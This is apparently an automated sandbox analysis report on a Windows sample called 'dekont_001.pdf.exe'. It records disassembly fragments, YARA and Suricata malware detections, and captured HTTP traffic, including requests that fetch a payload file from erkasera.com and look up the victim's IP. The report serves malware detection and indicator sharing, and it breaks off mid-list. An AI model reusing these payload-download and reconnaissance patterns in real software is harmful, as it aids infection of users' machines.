Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000035BE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000035BE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 010AF206h	1_2_010AF017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 010AFB90h	1_2_010AF017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_010AE538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_010AEB6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	1_2_010AED4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066A1A38h	1_2_066A1620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066A02F1h	1_2_066A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066A1471h	1_2_066A11C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AFD11h	1_2_066AFA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AC8F1h	1_2_066AC648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AF8B9h	1_2_066AF610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066A1A38h	1_2_066A1610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AD1A1h	1_2_066ACEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066ACD49h	1_2_066ACAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AD5F9h	1_2_066AD350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066ADA51h	1_2_066AD7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AE301h	1_2_066AE058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066ADEA9h	1_2_066ADC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AB791h	1_2_066AB4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066A0751h	1_2_066A04A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AE759h	1_2_066AE4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066A1011h	1_2_066A0D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AF009h	1_2_066AED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066A1A38h	1_2_066A1966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066ABBE9h	1_2_066AB940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AEBB1h	1_2_066AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066A0BB1h	1_2_066A0900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AC499h	1_2_066AC1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AF461h	1_2_066AF1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066AC041h	1_2_066ABD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D8945h	1_2_066D8608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D72FAh	1_2_066D7050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D5D19h	1_2_066D5A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D58C1h	1_2_066D5618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D6171h	1_2_066D5EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D6A21h	1_2_066D6778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D65C9h	1_2_066D6320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D6E79h	1_2_066D6BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	1_2_066D33A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	1_2_066D33B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D02E9h	1_2_066D0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D0B99h	1_2_066D08F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D7751h	1_2_066D74A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D0741h	1_2_066D0498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D0FF1h	1_2_066D0D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D8001h	1_2_066D7D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D7BA9h	1_2_066D7900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D8459h	1_2_066D81B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 066D5441h	1_2_066D5198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0108F1F6h	7_2_0108F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 0108FB80h	7_2_0108F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0108E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0108EB5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_0108ED3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06508945h	7_2_06508608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06505D19h	7_2_06505A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 065058C1h	7_2_06505618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06506171h	7_2_06505EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06506A21h	7_2_06506778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 065065C9h	7_2_06506320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06506E79h	7_2_06506BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_065033B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_065033A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 065072FAh	7_2_06507050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 065002E9h	7_2_06500040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06500B99h	7_2_065008F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06500741h	7_2_06500498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06507751h	7_2_065074A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06508001h	7_2_06507D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06500FF1h	7_2_06500D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06507BA9h	7_2_06507900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06505441h	7_2_06505198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06508459h	7_2_065081B0

Networking

Yara detected Generic Downloader

Source: Yara match

File source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /ruurew/Ktanfonto.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /ruurew/Ktanfonto.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.132.193.46 188.132.193.46
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ruurew/Ktanfonto.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /ruurew/Ktanfonto.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: erkasera.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002B98000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C54000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002C39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003019000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.000000000300B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000003038000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4215771932.0000000002F92000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4215341701.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 